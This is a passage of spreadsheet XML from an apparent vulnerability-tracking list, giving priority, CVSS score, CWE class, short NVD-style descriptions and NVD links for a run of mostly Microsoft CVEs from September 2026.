an unauthorized attacker to execute code over a network.</t></is></c><c r="T328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t></is></c></row><row r="329"><c r="A329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C329" s="5" t="inlineStr"><is><t>CVE-2026-69325</t></is></c><c r="D329" s="5" t="n"><v>8.1</v></c><c r="E329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G329" s="5" t="inlineStr" /><c r="H329" s="5" t="n"><v>0.006</v></c><c r="I329" s="5" t="inlineStr" /><c r="J329" s="5" t="inlineStr" /><c r="K329" s="5" t="inlineStr" /><c r="L329" s="5" t="inlineStr" /><c r="M329" s="5" t="inlineStr" /><c r="N329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q329" s="5" t="inlineStr" /><c r="R329" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S329" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t></is></c></row><row r="330"><c r="A330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C330" s="5" t="inlineStr"><is><t>CVE-2026-69380</t></is></c><c r="D330" s="5" t="n"><v>8.1</v></c><c r="E330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G330" s="5" t="inlineStr" /><c r="H330" s="5" t="n"><v>0.007</v></c><c r="I330" s="5" t="inlineStr" /><c r="J330" s="5" t="inlineStr" /><c r="K330" s="5" t="inlineStr" /><c r="L330" s="5" t="inlineStr" /><c r="M330" s="5" t="inlineStr" /><c r="N330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P330" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q330" s="5" t="inlineStr" /><c r="R330" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S330" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t></is></c></row><row r="331"><c r="A331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C331" s="5" t="inlineStr"><is><t>CVE-2026-69438</t></is></c><c r="D331" s="5" t="n"><v>8.1</v></c><c r="E331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F331" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G331" s="5" t="inlineStr" /><c r="H331" s="5" t="n"><v>0.007</v></c><c r="I331" s="5" t="inlineStr" /><c r="J331" s="5" t="inlineStr" /><c r="K331" s="5" t="inlineStr" /><c r="L331" s="5" t="inlineStr" /><c r="M331" s="5" t="inlineStr" /><c r="N331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P331" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q331" s="5" t="inlineStr" /><c r="R331" s="5" t="inlineStr"><is><t>CWE-681</t></is></c><c r="S331" s="5" t="inlineStr"><is><t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t></is></c></row><row r="332"><c r="A332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C332" s="5" t="inlineStr"><is><t>CVE-2026-69510</t></is></c><c r="D332" s="5" t="n"><v>8.1</v></c><c r="E332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F332" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G332" s="5" t="inlineStr" /><c r="H332" s="5" t="n"><v>0.007</v></c><c r="I332" s="5" t="inlineStr" /><c r="J332" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K332" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L332" s="5" t="inlineStr" /><c r="M332" s="5" t="inlineStr" /><c r="N332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P332" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q332" s="5" t="inlineStr" /><c r="R332" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S332" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t></is></c></row><row r="333"><c r="A333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C333" s="5" t="inlineStr"><is><t>CVE-2026-69524</t></is></c><c r="D333" s="5" t="n"><v>8.1</v></c><c r="E333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F333" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G333" s="5" t="inlineStr" /><c r="H333" s="5" t="n"><v>0.007</v></c><c r="I333" s="5" t="inlineStr" /><c r="J333" s="5" t="inlineStr" /><c r="K333" s="5" t="inlineStr" /><c r="L333" s="5" t="inlineStr" /><c r="M333" s="5" t="inlineStr" /><c r="N333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P333" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q333" s="5" t="inlineStr" /><c r="R333" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S333" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t></is></c></row><row r="334"><c r="A334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C334" s="5" t="inlineStr"><is><t>CVE-2026-69530</t></is></c><c r="D334" s="5" t="n"><v>8.1</v></c><c r="E334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F334" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G334" s="5" t="inlineStr" /><c r="H334" s="5" t="n"><v>0.006</v></c><c r="I334" s="5" t="inlineStr" /><c r="J334" s="5" t="inlineStr" /><c r="K334" s="5" t="inlineStr" /><c r="L334" s="5" t="inlineStr" /><c r="M334" s="5" t="inlineStr" /><c r="N334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P334" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q334" s="5" t="inlineStr" /><c r="R334" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S334" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t></is></c></row><row r="335"><c r="A335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C335" s="5" t="inlineStr"><is><t>CVE-2026-69546</t></is></c><c r="D335" s="5" t="n"><v>8.1</v></c><c r="E335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F335" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G335" s="5" t="inlineStr" /><c r="H335" s="5" t="n"><v>0.007</v></c><c r="I335" s="5" t="inlineStr" /><c r="J335" s="5" t="inlineStr" /><c r="K335" s="5" t="inlineStr" /><c r="L335" s="5" t="inlineStr" /><c r="M335" s="5" t="inlineStr" /><c r="N335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P335" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q335" s="5" t="inlineStr" /><c r="R335" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S335" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t></is></c></row><row r="336"><c r="A336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C336" s="5" t="inlineStr"><is><t>CVE-2026-69620</t></is></c><c r="D336" s="5" t="n"><v>8.1</v></c><c r="E336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F336" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G336" s="5" t="inlineStr" /><c r="H336" s="5" t="n"><v>0.007</v></c><c r="I336" s="5" t="inlineStr" /><c r="J336" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K336" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L336" s="5" t="inlineStr" /><c r="M336" s="5" t="inlineStr" /><c r="N336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q336" s="5" t="inlineStr" /><c r="R336" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S336" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t></is></c></row><row r="337"><c r="A337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C337" s="5" t="inlineStr"><is><t>CVE-2026-69680</t></is></c><c r="D337" s="5" t="n"><v>8.1</v></c><c r="E337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F337" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G337" s="5" t="inlineStr" /><c r="H337" s="5" t="n"><v>0.003</v></c><c r="I337" s="5" t="inlineStr" /><c r="J337" s="5" t="inlineStr" /><c r="K337" s="5" t="inlineStr" /><c r="L337" s="5" t="inlineStr" /><c r="M337" s="5" t="inlineStr" /><c r="N337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P337" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q337" s="5" t="inlineStr" /><c r="R337" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S337" s="5" t="inlineStr"><is><t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t></is></c></row><row r="338"><c r="A338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C338" s="5" t="inlineStr"><is><t>CVE-2026-69732</t></is></c><c r="D338" s="5" t="n"><v>8.1</v></c><c r="E338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F338" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G338" s="5" t="inlineStr" /><c r="H338" s="5" t="n"><v>0.007</v></c><c r="I338" s="5" t="inlineStr" /><c r="J338" s="5" t="inlineStr" /><c r="K338" s="5" t="inlineStr" /><c r="L338" s="5" t="inlineStr" /><c r="M338" s="5" t="inlineStr" /><c r="N338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P338" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q338" s="5" t="inlineStr" /><c r="R338" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S338" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t></is></c></row><row r="339"><c r="A339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C339" s="5" t="inlineStr"><is><t>CVE-2026-69782</t></is></c><c r="D339" s="5" t="n"><v>8.1</v></c><c r="E339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F339" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G339" s="5" t="inlineStr" /><c r="H339" s="5" t="n"><v>0.006</v></c><c r="I339" s="5" t="inlineStr" /><c r="J339" s="5" t="inlineStr" /><c r="K339" s="5" t="inlineStr" /><c r="L339" s="5" t="inlineStr" /><c r="M339" s="5" t="inlineStr" /><c r="N339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P339" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q339" s="5" t="inlineStr" /><c r="R339" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S339" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t></is></c></row><row r="340"><c r="A340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C340" s="5" t="inlineStr"><is><t>CVE-2026-69786</t></is></c><c r="D340" s="5" t="n"><v>8.1</v></c><c r="E340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F340" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G340" s="5" t="inlineStr" /><c r="H340" s="5" t="n"><v>0.007</v></c><c r="I340" s="5" t="inlineStr" /><c r="J340" s="5" t="inlineStr" /><c r="K340" s="5" t="inlineStr" /><c r="L340" s="5" t="inlineStr" /><c r="M340" s="5" t="inlineStr" /><c r="N340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P340" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q340" s="5" t="inlineStr" /><c r="R340" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S340" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t></is></c></row><row r="341"><c r="A341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C341" s="5" t="inlineStr"><is><t>CVE-2026-69813</t></is></c><c r="D341" s="5" t="n"><v>8.1</v></c><c r="E341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F341" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G341" s="5" t="inlineStr" /><c r="H341" s="5" t="n"><v>0.007</v></c><c r="I341" s="5" t="inlineStr" /><c r="J341" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K341" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L341" s="5" t="inlineStr" /><c r="M341" s="5" t="inlineStr" /><c r="N341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P341" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q341" s="5" t="inlineStr" /><c r="R341" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S341" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t></is></c></row><row r="342"><c r="A342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C342" s="5" t="inlineStr"><is><t>CVE-2026-69827</t></is></c><c r="D342" s="5" t="n"><v>8.1</v></c><c r="E342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G342" s="5" t="inlineStr" /><c r="H342" s="5" t="n"><v>0.005</v></c><c r="I342" s="5" t="inlineStr" /><c r="J342" s="5" t="inlineStr" /><c r="K342" s="5" t="inlineStr" /><c r="L342" s="5" t="inlineStr" /><c r="M342" s="5" t="inlineStr" /><c r="N342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q342" s="5" t="inlineStr" /><c r="R342" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S342" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t></is></c></row><row r="343"><c r="A343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C343" s="5" t="inlineStr"><is><t>CVE-2026-69858</t></is></c><c r="D343" s="5" t="n"><v>8.1</v></c><c r="E343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F343" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G343" s="5" t="inlineStr" /><c r="H343" s="5" t="n"><v>0.007</v></c><c r="I343" s="5" t="inlineStr" /><c r="J343" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K343" s="5" t="inlineStr"><is><t>microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L343" s="5" t="inlineStr" /><c r="M343" s="5" t="inlineStr" /><c r="N343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P343" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q343" s="5" t="inlineStr" /><c r="R343" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S343" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t></is></c></row><row r="344"><c r="A344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C344" s="5" t="inlineStr"><is><t>CVE-2026-69989</t></is></c><c r="D344" s="5" t="n"><v>8.1</v></c><c r="E344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F344" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G344" s="5" t="inlineStr" /><c r="H344" s="5" t="n"><v>0.007</v></c><c r="I344" s="5" t="inlineStr" /><c r="J344" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K344" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L344" s="5" t="inlineStr" /><c r="M344" s="5" t="inlineStr" /><c r="N344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P344" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q344" s="5" t="inlineStr" /><c r="R344" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S344" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t></is></c></row><row r="345"><c r="A345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C345" s="5" t="inlineStr"><is><t>CVE-2026-70342</t></is></c><c r="D345" s="5" t="n"><v>8.1</v></c><c r="E345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F345" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G345" s="5" t="inlineStr" /><c r="H345" s="5" t="n"><v>0.008999999999999999</v></c><c r="I345" s="5" t="inlineStr" /><c r="J345" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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5" s="5" t="inlineStr" /><c r="M345" s="5" t="inlineStr" /><c r="N345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P345" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q345" s="5" t="inlineStr" /><c r="R345" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S345" s="5" t="inlineStr"><is><t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t></is></c></row><row r="346"><c r="A346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C346" s="5" t="inlineStr"><is><t>CVE-2026-70563</t></is></c><c r="D346" s="5" t="n"><v>8.1</v></c><c r="E346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G346" s="5" t="inlineStr" /><c r="H346" s="5" t="n"><v>0.008999999999999999</v></c><c r="I346" s="5" t="inlineStr" /><c r="J346" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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6" s="5" t="inlineStr" /><c r="M346" s="5" t="inlineStr" /><c r="N346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P346" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q346" s="5" t="inlineStr" /><c r="R346" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S346" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t></is></c></row><row r="347"><c r="A347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C347" s="5" t="inlineStr"><is><t>CVE-2026-72936</t></is></c><c r="D347" s="5" t="n"><v>8.1</v></c><c r="E347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G347" s="5" t="inlineStr" /><c r="H347" s="5" t="n"><v>0.006</v></c><c r="I347" s="5" t="inlineStr" /><c r="J347" s="5" t="inlineStr" /><c r="K347" s="5" t="inlineStr" /><c r="L347" s="5" t="inlineStr" /><c r="M347" s="5" t="inlineStr" /><c r="N347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P347" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q347" s="5" t="inlineStr" /><c r="R347" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S347" s="5" t="inlineStr"><is><t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t></is></c></row><row r="348"><c r="A348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C348" s="5" t="inlineStr"><is><t>CVE-2026-72981</t></is></c><c r="D348" s="5" t="n"><v>8.1</v></c><c r="E348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G348" s="5" t="inlineStr" /><c r="H348" s="5" t="n"><v>0.005</v></c><c r="I348" s="5" t="inlineStr" /><c r="J348" s="5" t="inlineStr" /><c r="K348" s="5" t="inlineStr" /><c r="L348" s="5" t="inlineStr" /><c r="M348" s="5" t="inlineStr" /><c r="N348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P348" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q348" s="5" t="inlineStr" /><c r="R348" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S348" s="5" t="inlineStr"><is><t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t></is></c></row><row r="349"><c r="A349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C349" s="5" t="inlineStr"><is><t>CVE-2026-72987</t></is></c><c r="D349" s="5" t="n"><v>8.1</v></c><c r="E349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G349" s="5" t="inlineStr" /><c r="H349" s="5" t="n"><v>0.006</v></c><c r="I349" s="5" t="inlineStr" /><c r="J349" s="5" t="inlineStr" /><c r="K349" s="5" t="inlineStr" /><c r="L349" s="5" t="inlineStr" /><c r="M349" s="5" t="inlineStr" /><c r="N349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P349" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q349" s="5" t="inlineStr" /><c r="R349" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S349" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t></is></c></row><row r="350"><c r="A350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C350" s="5" t="inlineStr"><is><t>CVE-2026-73313</t></is></c><c r="D350" s="5" t="n"><v>8.1</v></c><c r="E350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G350" s="5" t="inlineStr" /><c r="H350" s="5" t="n"><v>0.004</v></c><c r="I350" s="5" t="inlineStr" /><c r="J350" s="5" t="inlineStr" /><c r="K350" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L350" s="5" t="inlineStr" /><c r="M350" s="5" t="inlineStr" /><c r="N350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P350" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q350" s="5" t="inlineStr" /><c r="R350" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S350" s="5" t="inlineStr"><is><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is></c><c r="T350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t></is></c></row><row r="351"><c r="A351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C351" s="5" t="inlineStr"><is><t>CVE-2026-75021</t></is></c><c r="D351" s="5" t="n"><v>8.1</v></c><c r="E351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F351" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G351" s="5" t="inlineStr" /><c r="H351" s="5" t="n"><v>0.004</v></c><c 